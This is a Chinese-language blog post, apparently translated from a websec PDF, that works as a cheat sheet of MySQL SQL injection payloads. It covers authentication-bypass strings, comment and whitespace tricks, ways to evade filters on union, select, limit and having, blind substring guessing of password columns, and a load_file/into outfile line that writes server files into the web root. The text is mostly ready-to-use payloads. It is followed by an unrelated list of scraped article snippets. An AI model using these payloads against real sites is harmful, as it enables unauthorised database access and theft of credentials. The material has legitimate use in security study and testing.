原文地址:http://websec.files.wordpress.com/2010/11/sqli2.pdf

0x00、介绍

也可以参考瞌腄龙的mysql注入科普:http://drops.wooyun.org/tips/123

很多东西都是一样的,但是有一些小技巧确实很使用。

以下所有技巧都只在mysql适用,因为它太灵活了

0x01 MYSQl灵活的语法

1 MySQL语法以及认证绕过

注释符:

#,

-- X(X为任意字符)

/*(MySQL-5.1)

;%00

'

'or 1=1;%00

'or 1=1 union select 1,2''

'or 1=1 #

'/*!50000or*/ 1=1 -- -      //版本号为5.1.38时只要小于50138

'/*!or*/ 1=1 -- -

前缀:

任意混合 + - ~ !

'or --+2=- -!!!'2

测试后发现and/or后面可以跟上偶数个!、~可以替代空格,也可以混合使用(混合后规律又不同),and/or前的空格可以省略

'or- -!!!1=1;

运算符:

^, =, !=, %, /, *, &, &&, |, ||, <, >, <<, >>, >=, <=, <>, <=>, XOR,DIV, SOUNDS LIKE, RLIKE, REGEXP, IS, NOT, BETWEEN,……

'or 1 rlike '1

空格替换:%20, %09, %0a, %0b, %0c, %0d, %a0

也可以插入括号,前缀,操作符,引号

'or+(1)sounds/**/like"1"--%a0-

字符串格式

    ' or "a"='a'

    ' or 'a'=n'a'               //unicode

    ' or 'a'=b'1100001'         //binary

    ' or 'a'=_binary'1100001'   //5.5.41下测试无效

    ' or 'a'=x'61'              //16进制

2、MySQL常用的一些小工具

常量:true, false, null, \N, current_timestamp....

变量:@myvar:=1

系统变量:@@version, @@datadir....

常用函数:version(), pi(), pow(), char(), substring()....

3、MySQL类型转换

' or 1=true #true=1, false=0

' or 1 #true

' or version()=5.5 #5.5.41-log

' or round(pi(),1)+true+true+0.4=version() #3.1+1+1+0.4

select * from users where 'a'='b'='c'

select * from users where ('a'='b')='c'

select * from users where (false)='c'

select * from users where (0)='c'

select * from users where (0)=0

select * from users where true

select * from users

以上的语句都是同样的效果

4、认证绕过

绕过语句:'='

select data from users where name="="

select data from users where flase="

select data from users where 0=0

绕过语句:'-'

select data from users where name=''-''

select data from users where name=0-0

select data from users where 0=0

0x02 关键字过滤

空格

过滤代码/\s/

%20, %09, %0a, %0b, %0c, %0d, %a0

关键字OR,AND

过滤代码/\sor\s/i,/\sand\s/i

'||1='1     #or

'='

'&&1='1     #and

关键字union select

过滤代码/union\s+select/i

'and(true)like(false)union(select(pass)from(users))#

'union [all|distinct] select pass from users#

'union%a0select pass from users#

'union/*!select*/pass from users#

/vuln.php?id=1 union/*&sort=*/select pass from users-- -

如果单独过滤union,使用盲注来获取数据

'and(select pass from users limit 1)='secret

通过子查询获取单值来进行比较

关键字limit

过滤代码/limit/i

'and(select pass from users where id=1)='a

'and(select pass from users group by id having id=1)='a

'and length((select pass from users having substr(pass,1,1)='a'))

关键字having

过滤代码/having/i

'and(select substr(group_concat(pass),1,1)from users)='a

关键字select ... from

过滤代码/SELECT\s+[A-Za-z.]+\s+FROM/i/i

select [all|distinct] pass from users

select'table_name'from'information_schema' . 'tables'

select pass as alias from users

select pass aliasalias from users

select pass'alias alias'from users

select+pass%a0from(users)

关键字select

过滤代码/select/i

1 有文件读取权限

' and substr(load_file('file'),locate('DocumentRoot',(load_file('file')))+

length('DocumentRoot'),10)='a'='' into outfile '/var/www/dump.txt

2 获取列名

' and 列名 is not null#

' procedure analyse()#

使用substr来做过滤条件

'and substr(pass,1,1)='a

关键字select,and,&

'0#

select data from users where name = ''-0 # int typecast

select data from users where name = 0 # int typecast

select data from users where 0 = 0 # true

'-1#

select data from users where 0 = -1 # false

使用条件判断来进行true、false的选择

    ifnull(nullif()), case when, if()

    '-if(name='Admin',1,0)#

使用嵌套条件'-if(

if(name='Admin',1,0), // condition

if(substr(pass,1,1)='a',1,0) // if true

,0)# // if false

0x03 函数过滤

构建字符串相关函数

unhex char hex ascii ord substr substring mid pad left right insert

' and substr(data,1,1) = 'a'#

' and substr(data,1,1) = 0x61# 0x6162

' and substr(data,1,1) = unhex(61)# unhex(6162)

' and substr(data,1,1) = char(97)# char(97,98)

' and hex(substr(data,1,1)) = 61#

' and ascii(substr(data,1,1)) = 97#

' and ord(substr(data,1,1)) = 97#

使用conv来进行进制的转换

' and substr(data,1,1) = lower(conv(10,10,36))# 'a'

' and substr(data,1,1) = lower(conv(11,10,36))# 'b'

' and substr(data,1,1) = lower(conv(36,10,36))# 'z'

使用函数来猜解数据

' and substr(data,1,1) = 'a'#

' and substring(data,1,1) = 'a'#

' and mid(data,1,1) = 'a'#

不适用逗号来获取

' and substr(data from 1 for 1) = 'a'#

同样也可以使用一下比较少见的函数来尝试绕过

lpad(data,1,space(1)) // lpad('hi',4,'?') = '??hi'

rpad(data,1,space(1)) // rpad('hi',4,'?') = 'hi??'

left(data,1)

reverse(right(reverse(data),1))

insert(insert(version(),1,0,space(0)),2,222,space(0))

有些函数有类似搜索匹配的功能

'-if(locate('f',data),1,0)#

'-if(locate('fo',data),1,0)#

'-if(locate('foo',data),1,0)#

instr(), position()

使用函数进行字符串的切割

length(trim(leading 'a' FROM data)) # length will be shorter

length(replace(data, 'a', '')) # length will be shorter

2种方式都是相同效果

0x04 注入时主要使用的一些东西

1个控制流程操作(select, case, if(), ...)

1个比较操作(=, like, mod(), ...)

1个字符串的猜解(mid(), left(), rpad(), …)

1个字符串生成(0x61, hex(), conv())

使用conv([10-36],10,36)可以实现所有字符的表示

false !pi()           0     ceil(pi()*pi())           10 A      ceil((pi()+pi())*pi()) 20       K

true !!pi()           1     ceil(pi()*pi())+true      11 B      ceil(ceil(pi())*version()) 21   L

true+true             2     ceil(pi()+pi()+version()) 12 C      ceil(pi()*ceil(pi()+pi())) 22   M

floor(pi())           3     floor(pi()*pi()+pi())     13 D      ceil((pi()+ceil(pi()))*pi()) 23 N

ceil(pi())            4     ceil(pi()*pi()+pi())      14 E      ceil(pi())*ceil(version()) 24   O

floor(version())      5     ceil(pi()*pi()+version()) 15 F      floor(pi()*(version()+pi())) 25 P

ceil(version())       6     floor(pi()*version())     16 G      floor(version()*version()) 26   Q

ceil(pi()+pi())       7     ceil(pi()*version())      17 H      ceil(version()*version()) 27    R

floor(version()+pi()) 8     ceil(pi()*version())+true 18 I      ceil(pi()*pi()*pi()-pi()) 28    S

floor(pi()*pi())      9     floor((pi()+pi())*pi())   19 J      floor(pi()*pi()*floor(pi())) 29 T

更多详细的东西可以参考原文去了解,还有一些其他的注入资料可以参考

http://www.ptsecurity.com/download/PT-devteev-CC-WAF-ENG.pdf

https://media.blackhat.com/bh-us-12/Briefings/Ristic/BH_US_12_Ristic_Protocol_Level_Slides.pdf

http://www.blackhatlibrary.net/SQL_injection

http://websec.ca/kb/sql_injection

安全测试===Mysql 注入技巧学习 MySQL注入技巧(2)的更多相关文章

  1. Spring.NET依赖注入框架学习--简单对象注入

    Spring.NET依赖注入框架学习--简单对象注入 在前面的俩篇中讲解了依赖注入的概念以及Spring.NET框架的核心模块介绍,今天就要看看怎么来使用Spring.NET实现一个简单的对象注入 常 ...

  2. 安全测试===Mysql 注入技巧学习 MySQL注入技巧(1)

    默认存在的数据库: mysql 需要root权限读取 information_schema 在5以上的版本中存在 测试是否存在注入方法 假:表示查询是错误的 (MySQL 报错/返回页面与原来不同) ...

  3. mysql存储过程的学习(mysql提高执行效率之进阶过程)

    1:存储过程: 答:存储过程是sql语句和控制语句的预编译集合,以一个名称存储并作为一个单元处理:存储过程存储在数据库内,可以由应用程序调用执行,而且允许用户声明变量以及进行流程控制,存储类型可以接受 ...

  4. Java工程师学习指南第7部分:重新学习MySQL与Redis

    本文整理了微信公众号[Java技术江湖]发表和转载过的Mysql和Redis相关优质文章,想看到更多Java技术文章,就赶紧关注本公众号吧吧. 大白话说说mysql 面试官:给我说说你平时是如何优化M ...

  5. MySQL 定时器EVENT学习

    原文:http://blog.csdn.net/lifuxiangcaohui/article/details/6583535 MySQL 定时器EVENT学习 MySQL从5.1开始支持event功 ...

  6. 重新学习MySQL数据库11:以Java的视角来聊聊SQL注入

    本文转自互联网 本系列文章将整理到我在GitHub上的<Java面试指南>仓库,更多精彩内容请到我的仓库里查看 https://github.com/h2pl/Java-Tutorial ...

  7. 【漏洞汇总】SQL 注入漏洞之 mysql

    日期:2019-07-23 19:55:59 更新:2019-08-02 10:40:37 作者:Bay0net 介绍:Mysql 注入笔记 0x01. 基本信息 1.1 基本术语 数据库: 数据库是 ...

  8. mysql的floor()报错注入方法详细分析

    刚开始学习sql注入,遇见了 select count(*) from table group by floor(rand(0)*2); 这么条语句.在此做个总结. (更好的阅读体验可访问 这里 ) ...

  9. 2019-9-10:渗透测试,基础学习,sql注入笔记

    sql注入1,万能密码,自己写的网站,找到登录窗口,必须和数据库交互,往里插入构造的恶意代码,最后可以直接登录进去,不需要账号和密码,输入的恶意代码成为万能密码,后端拼接的sql语句,SELECT * ...

随机推荐

  1. adb usage

    使用安卓调试及自动化,不可避免的要使用adb,说明看起来很麻烦,进行简单记录,以便时候不时之需. usb连接手机调试就很简单了.首先,在手机端开启usb调试,即点击安卓版本项7次,就可以显示开发者菜单 ...

  2. 机器学习 (三) 逻辑回归 Logistic Regression

    文章内容均来自斯坦福大学的Andrew Ng教授讲解的Machine Learning课程,本文是针对该课程的个人学习笔记,如有疏漏,请以原课程所讲述内容为准.感谢博主Rachel Zhang 的个人 ...

  3. ajax 异步刷新,需要填写的参数

    参数 options 类型:Object 可选.AJAX 请求设置.所有选项都是可选的. ******* async 类型:Boolean 默认值: true.默认设置下,所有请求均为异步请求.如果需 ...

  4. MySQL中Alter用法小结

    alter 方法是我们在处理MySQL数据库中一个常见的方法,能帮助我们更好的处理数据库中的表 1.增加 数据库中表的字段:alter table table_name add [column] co ...

  5. nopcommerce商城系统--技术与系统需求

    原址:http://www.nopcommerce.com/technologysystemrequirements.aspx 在这里,我们将着眼于nopCommerce的系统要求.为了运行nopCo ...

  6. 浅谈C#中show和showDialog的区别

    [转载] A.WinForm中窗体显示  显示窗体可以有以下2种方法:  Form.ShowDialog方法 (窗体显示为模式窗体)  Form.Show方法 (窗体显示为无模式窗体) 2者具体区别如 ...

  7. 转:C++中临时对象及返回值优化

    http://www.cnblogs.com/xkfz007/articles/2506022.html 什么是临时对象? C++真正的临时对象是不可见的匿名对象,不会出现在你的源码中,但是程序在运行 ...

  8. Mybatis学习系列(一)入门简介

    MyBatis简介 Mybatis是Apache的一个Java开源项目,是一个支持动态Sql语句的持久层框架.Mybatis可以将Sql语句配置在XML文件中,避免将Sql语句硬编码在Java类中.与 ...

  9. Linux上删除空行的方法

    grep . data.txt grep-v'^$' data.txt grep'[^$]' data.txt sed'/^$/d' data.txt sed'/^\s*$/d' data.txt # ...

  10. php 将数组存入cookie

    最近在做一个购物车的功能,需要将商品的ID和商品数量存入cookie,实际上,cookie是不能存数组的,因此需要用到序列化函数serialize() 函数解释: serialize()就是将PHP中 ...